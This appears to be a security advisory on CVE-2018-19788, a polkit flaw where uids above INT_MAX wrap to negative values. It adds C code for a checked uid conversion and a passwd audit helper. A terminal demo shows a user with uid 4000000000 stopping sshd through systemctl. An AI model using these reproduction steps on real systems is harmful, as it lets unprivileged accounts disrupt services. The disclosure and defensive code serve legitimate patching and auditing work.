Critical vulnerability in PolicyKit (polkit), reachable through systemd's systemctl
[CVE-2018-19788]: A flaw was found in PolicyKit (aka polkit) 0.115 that allows a user with a uid greater than INT_MAX to successfully execute any systemctl command.
Root cause: polkit stores the subject's uid in a signed 32-bit gint. A uid above INT_MAX (2147483647) does not fit and wraps to a negative value (the -294967296 in the demo's GLib warning below is 4000000000 - 2^32), so polkit no longer identifies the calling user correctly and the privileged operation goes through. Fixed upstream in polkit 0.116; until it is deployed, audit local accounts for uids above 2147483647, since such an account is the precondition for the attack.
- https://github.com/systemd/systemd/issues/11026
- https://github.com/freedesktop/polkit/blob/8c1bc8a/src/programs/pkttyagent.c#L156
- https://gitlab.freedesktop.org/polkit/polkit/issues/74
Find out more about CVE-2018-19788 from the MITRE CVE dictionary and NIST NVD
DEMO
root@ahihi:~# useradd -u 4000000000 wtf
root@ahihi:~# su - wtf
No directory, logging in with HOME=/
$ whoami
wtf
$ id
uid=4000000000(wtf) gid=1002(wtf) groups=1002(wtf)
$ systemctl stop sshd.service
(process:22860): GLib-GObject-WARNING **: value "-294967296" of type 'gint' is invalid or out of range for property 'uid' of type 'gint'
**
ERROR:pkttyagent.c:175:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)
root@ahihi:~# systemctl status sshd.service
...
Dec 05 15:38:39 ahihi systemd[1]: Stopping OpenBSD Secure Shell server...
Dec 05 15:38:39 ahihi systemd[1]: Stopped OpenBSD Secure Shell server.
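The following is an added example, not code from the original page or from polkit: it reproduces the narrowing that produces the -294967296 in the warning above, shows a checked conversion that refuses uids that do not fit a signed 32-bit int, and includes a small audit helper that counts passwd entries with uid > INT_MAX. It assumes a Linux uid_t of 32 unsigned bits and a two's-complement int (the usual glibc/x86-64 case); the passwd text is a constructed sample, not a real system's file.

```c
/* Added example (not from the page or from polkit). Assumes 32-bit unsigned
 * uid_t and two's-complement 32-bit int, as on glibc/x86-64. */
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

/* What happens when a uid_t is copied into a 'gint' (plain int) as polkit
 * 0.115 did. For values above INT_MAX the conversion wraps modulo 2^32 on
 * GCC/Clang: 4000000000 becomes -294967296, the value in the demo's warning. */
int narrow_uid_to_gint(uid_t uid)
{
    return (int)uid;  /* implementation-defined narrowing; wraps on common targets */
}

/* Hardened check: 1 if the uid can be stored in an int without wrapping. */
int uid_fits_gint(uid_t uid)
{
    return (uintmax_t)uid <= (uintmax_t)INT_MAX;
}

/* Checked conversion: returns 1 and stores the value on success, 0 and
 * leaves *out untouched when the uid would wrap. */
int uid_to_gint_checked(uid_t uid, int *out)
{
    if (!uid_fits_gint(uid))
        return 0;
    *out = (int)uid;
    return 1;
}

/* Audit helper: count passwd-format lines (name:pw:uid:gid:...) whose third
 * field, the uid, is above INT_MAX. Such accounts are the attack precondition. */
int count_uids_above_int_max(const char *passwd_text)
{
    int count = 0;
    const char *line = passwd_text;
    while (*line) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        const char *p = line;
        int field = 0;
        /* skip the first two ':'-separated fields */
        while (field < 2 && p < line + len) {
            if (*p == ':')
                field++;
            p++;
        }
        if (field == 2) {
            char *end;
            unsigned long long uid = strtoull(p, &end, 10);
            if (end != p && uid > (unsigned long long)INT_MAX)
                count++;
        }
        if (!eol)
            break;
        line = eol + 1;
    }
    return count;
}

/* Constructed sample, not a real /etc/passwd; "wtf" mirrors the demo's user. */
static const char SAMPLE_PASSWD[] =
    "root:x:0:0:root:/root:/bin/bash\n"
    "alice:x:1000:1000::/home/alice:/bin/bash\n"
    "wtf:x:4000000000:1002::/:/bin/sh\n"
    "nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n";

int main(void)
{
    int g = 0;
    printf("narrowed 4000000000 -> %d\n", narrow_uid_to_gint((uid_t)4000000000u));
    printf("checked 1000 ok: %d\n", uid_to_gint_checked(1000, &g));
    printf("checked 4000000000 ok: %d\n", uid_to_gint_checked((uid_t)4000000000u, &g));
    printf("accounts with uid > INT_MAX: %d\n", count_uids_above_int_max(SAMPLE_PASSWD));
    return 0;
}
```

Running the audit helper over a live system is the same loop fed with /etc/passwd; any non-zero count on a host running polkit older than 0.116 is worth treating as a finding.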